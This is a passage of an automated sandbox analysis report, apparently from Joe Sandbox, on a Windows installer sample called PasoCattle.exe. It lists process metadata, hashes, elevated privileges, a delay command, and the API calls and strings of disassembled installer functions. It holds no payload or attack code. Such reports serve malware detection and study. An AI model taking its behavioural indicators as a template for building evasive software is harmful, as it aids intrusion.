MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	03:56:42
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x90000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 059D0590 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2387587166.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59d0000_TNyOrM6mIM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45c3cc7d1ed56ba40ff869833792382ccf8e65f25d7a7a68004e2baad0d34e96
Instruction ID: 2d42b7111b1616b7755cc50fc50a3071f9ce02152f1cebf1e2f336bc40048cee
Opcode Fuzzy Hash: 45c3cc7d1ed56ba40ff869833792382ccf8e65f25d7a7a68004e2baad0d34e96
Instruction Fuzzy Hash: C751617090538ACFCB05DBB8E491A9EBBB3FF89314F109969C6046B341DB396A05CB91

Function 059D0A08 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2387587166.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59d0000_TNyOrM6mIM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 071fbb2ed9cbf733752b5bd8518517a4d3b4fb5a920cdf0a38b5b26f2f199cc9
Instruction ID: 725b22cf65a84ca77e2e91943e3c258d0ea7176f8864ab856e424c3c9c413caa
Opcode Fuzzy Hash: 071fbb2ed9cbf733752b5bd8518517a4d3b4fb5a920cdf0a38b5b26f2f199cc9
Instruction Fuzzy Hash: E761A2357182019FCB14EB78D05DA29BBE6BB88310F55D429E50AD7391EF74EC41CBA1

Function 059D0848 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2387587166.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59d0000_TNyOrM6mIM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abdca584ced955f1a2a14aeabf3a74c12a7e50aed66faf63437fcf7ce8b18dd4
Instruction ID: 00e584e0343fd35b7c1945ec90a7d9ca96aa7670d4badb692530bae336b0ee22
Opcode Fuzzy Hash: abdca584ced955f1a2a14aeabf3a74c12a7e50aed66faf63437fcf7ce8b18dd4
Instruction Fuzzy Hash: D5416F7090528ACFCB05DFB8E491A9EBBF3FF88314F109969C6046B340DB396A45CB91

Function 059D0C90 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2387587166.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59d0000_TNyOrM6mIM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f165e155ac27420567fa416a385481249a76992f91b34f7c248846851bef81d
Instruction ID: 2394ca64ec67e5a219d7e59ddaa72211bd49727ac371a3d87bc140d9c0e4f925
Opcode Fuzzy Hash: 7f165e155ac27420567fa416a385481249a76992f91b34f7c248846851bef81d
Instruction Fuzzy Hash: 213105757002158BCB00DBBAD988A6EFBE5FB88254F148526D90DD7341EB30E901CBE1

Analysis Process: PasoCattle.exePID: 6572, Parent PID: 7112COMMON

Execution Graph

Execution Coverage:	17.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	25

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,76E223A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

{, xrefs: 0040537E
New install of "%s" to "%s", xrefs: 004051AE

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

NSIS Error, xrefs: 0040390E
~nsu.tmp, xrefs: 00403B23
\Temp, xrefs: 00403A47
/D=, xrefs: 004039D2
NCRC, xrefs: 004039A8
SeShutdownPrivilege, xrefs: 00403C42
_?=, xrefs: 00403A90
Error launching installer, xrefs: 00403AA9

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: "%s" (%d), xrefs: 004017BF
Jump: %d, xrefs: 00401602
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Rename: %s, xrefs: 004018F8
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Sleep(%d), xrefs: 0040169D
CreateDirectory: "%s" created, xrefs: 00401849
detailprint: %s, xrefs: 00401679
Rename failed: %s, xrefs: 0040194B
SetFileAttributes failed., xrefs: 004017A1
Rename on reboot: %s, xrefs: 00401943
BringToFront, xrefs: 004016BD
Call: %d, xrefs: 0040165A
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Aborting: "%s", xrefs: 0040161D

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

.DEFAULT\Control Panel\International, xrefs: 004059C5
RichEdit, xrefs: 00405BF0
_Nb, xrefs: 00405AFD
@jG, xrefs: 00405AF2
"F, xrefs: 00405A4B
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
.exe, xrefs: 00405A69
RichEd32, xrefs: 00405BD4
RichEd20, xrefs: 00405BC9
F, xrefs: 00405A22
RichEdit20A, xrefs: 00405BE2, 00405BE7

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,76E223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FE6
